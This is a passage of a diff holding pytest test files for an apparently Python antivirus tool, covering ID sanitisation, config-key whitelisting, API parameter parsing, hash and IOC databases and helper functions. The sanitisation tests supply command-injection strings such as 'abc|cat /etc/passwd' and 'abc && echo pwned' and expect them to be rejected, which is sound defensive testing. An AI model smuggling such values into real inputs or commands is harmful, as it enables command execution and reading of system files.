self.scanner._sanitize_id("abc|cat /etc/passwd")
def test_ampersand_injection(self):
with pytest.raises(ValueError):
self.scanner._sanitize_id("abc && echo pwned")
def test_empty_rejected(self):
with pytest.raises(ValueError):
self.scanner._sanitize_id("")
def test_too_long_rejected(self):
with pytest.raises(ValueError):
self.scanner._sanitize_id("a" * 200)
def test_valid_ids(self):
assert self.scanner._sanitize_id("abc123") == "abc123"
assert self.scanner._sanitize_id("my-container") == "my-container"
assert self.scanner._sanitize_id("web_app.v2") == "web_app.v2"
assert self.scanner._sanitize_id("a1b2c3d4e5f6") == "a1b2c3d4e5f6"
# -----------------------------------------------------------------------
# Fix 6: Config key validation
# -----------------------------------------------------------------------
def test_config_key_whitelist_in_cli():
"""The config --set handler should reject unknown keys.
We verify by inspecting the CLI module source for the VALID_CONFIG_KEYS
set and its guard clause, since it's defined inside a Click command body.
"""
import inspect
import ayn_antivirus.cli as cli_mod
src = inspect.getsource(cli_mod)
assert "VALID_CONFIG_KEYS" in src
assert '"scan_paths"' in src
assert '"dashboard_port"' in src
# Verify the guard clause exists
assert "if key not in VALID_CONFIG_KEYS" in src
# -----------------------------------------------------------------------
# Fix 9: API query param validation
# -----------------------------------------------------------------------
def test_safe_int_helper():
from ayn_antivirus.dashboard.api import _safe_int
assert _safe_int("50", 10) == 50
assert _safe_int("abc", 10) == 10
assert _safe_int("", 10) == 10
assert _safe_int(None, 10) == 10
assert _safe_int("-5", 10, min_val=1) == 1
assert _safe_int("9999", 10, max_val=500) == 500
assert _safe_int("0", 10, min_val=1) == 1


@@ -0,0 +1,53 @@
import pytest
from ayn_antivirus.signatures.db.hash_db import HashDatabase
from ayn_antivirus.signatures.db.ioc_db import IOCDatabase
def test_hash_db_create(tmp_path):
db = HashDatabase(str(tmp_path / "test.db"))
db.initialize()
assert db.count() == 0
db.close()
def test_hash_db_add_and_lookup(tmp_path):
db = HashDatabase(str(tmp_path / "test.db"))
db.initialize()
db.add_hash("abc123hash", "TestMalware", "virus", "high", "test")
result = db.lookup("abc123hash")
assert result is not None
assert result["threat_name"] == "TestMalware"
db.close()
def test_hash_db_bulk_add(tmp_path):
db = HashDatabase(str(tmp_path / "test.db"))
db.initialize()
records = [
("hash1", "Malware1", "virus", "high", "test", ""),
("hash2", "Malware2", "malware", "medium", "test", ""),
("hash3", "Miner1", "miner", "high", "test", ""),
]
count = db.bulk_add(records)
assert count == 3
assert db.count() == 3
db.close()
def test_ioc_db_ips(tmp_path):
db = IOCDatabase(str(tmp_path / "test.db"))
db.initialize()
db.add_ip("1.2.3.4", "BotnetC2", "c2", "feodo")
result = db.lookup_ip("1.2.3.4")
assert result is not None
ips = db.get_all_malicious_ips()
assert "1.2.3.4" in ips
db.close()
def test_ioc_db_domains(tmp_path):
db = IOCDatabase(str(tmp_path / "test.db"))
db.initialize()
db.add_domain("evil.com", "Phishing", "phishing", "threatfox")
result = db.lookup_domain("evil.com")
assert result is not None
domains = db.get_all_malicious_domains()
assert "evil.com" in domains
db.close()


@@ -0,0 +1,49 @@
import pytest
from ayn_antivirus.utils.helpers import (
format_size, format_duration, is_root, validate_ip,
validate_domain, generate_id, hash_file, safe_path
)
def test_format_size():
assert format_size(0) == "0.0 B"
assert format_size(1024) == "1.0 KB"
assert format_size(1048576) == "1.0 MB"
assert format_size(1073741824) == "1.0 GB"
def test_format_duration():
assert "0s" in format_duration(0) or "0" in format_duration(0)
result = format_duration(3661)
assert "1h" in result
assert "1m" in result
def test_validate_ip():
    assert validate_ip("192.168.1.1") is True
    assert validate_ip("10.0.0.1") is True
    assert validate_ip("999.999.999.999") is False
    assert validate_ip("not-an-ip") is False
    assert validate_ip("") is False
def test_validate_domain():
    assert validate_domain("example.com") is True
    assert validate_domain("sub.example.com") is True
    assert validate_domain("") is False
def test_generate_id():
id1 = generate_id()
id2 = generate_id()
assert isinstance(id1, str)
assert len(id1) == 32
assert id1 != id2
def test_hash_file(tmp_path):
f = tmp_path / "test.txt"
f.write_text("hello world")
h = hash_file(str(f))
assert isinstance(h, str)
assert len(h) == 64 # sha256 hex
def test_safe_path(tmp_path):
result = safe_path(str(tmp_path))
assert result is not None

BIN
hub-check.png Normal file

Binary file not shown.
